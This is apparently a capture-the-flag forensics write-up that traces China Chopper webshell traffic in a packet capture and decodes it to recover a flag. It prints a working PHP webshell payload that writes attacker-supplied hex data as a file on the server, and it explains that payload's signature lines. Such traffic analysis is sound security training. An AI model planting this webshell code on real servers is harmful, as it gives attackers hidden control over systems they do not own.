【WEB】BackDoor

Dear 丶 2022-05-15 04:35

![70][]

--------------------

Download the packet capture; it shows traces of a China Chopper (菜刀) connection. How do we know? Look at the capture: following the TCP stream reveals the traces of the connection.

Right-click, Follow TCP Stream, and two encoded strings appear:

![image][70 1]

Base64-decoding the string reveals China Chopper's signature code:

![image][70 2]

After decoding, the signature looks like this:

```php
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\uploads\\reverseshell.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
```

How do we tell it is China Chopper? Some background:

1. `@ini_set("display_errors","0");` temporarily turns off PHP's error display.
2. `@set_time_limit(0);` prevents timeouts on commands such as `dir` or when uploading a large webshell.
3. `@set_magic_quotes_runtime(0);` turns off magic quotes; this has hardly been used since PHP 4.0.
4. `echo("->|");` nothing special to say.
5. `print("hello PHP!");` outputs a string.
6. `die();` does exactly what its name says.

The other commands follow the same pattern.

OK, continuing: we find that China Chopper is being used to control the server. Locate the encoded string:

![70 3][]

Copying it out, we find it is hexadecimal. Convert it with Notepad++:

![image][70 4]

Choose Plugins > Hex to ASCII:

![image][70 5]

The result is a blob of unreadable bytes:

![image][70 6]

Save it as a .zip:

![image][70 7]

Open it and scan the QR code to get the flag!

[70]: /images/20220515/3936e724b3044e099497f0b14ef62956.png
[70 1]: /images/20220515/3cdf0c936b2548c1a12be1c4f459f0e3.png
[70 2]: /images/20220515/61a1d3969c1f46fdae88e0ea1bb1ecb0.png
[70 3]: /images/20220515/8e5a8c25a28f4e21bed76b147cb2cd7b.png
[70 4]: /images/20220515/a0566c0944694d1b8bcb493c83660a6f.png
[70 5]: /images/20220515/fd273ac6041046f6ac58a3b39739e453.png
[70 6]: /images/20220515/6446a24a2892456287805e75c18c6d05.png
[70 7]: /images/20220515/27a264a0efec4996b2aaa23761fa74e1.png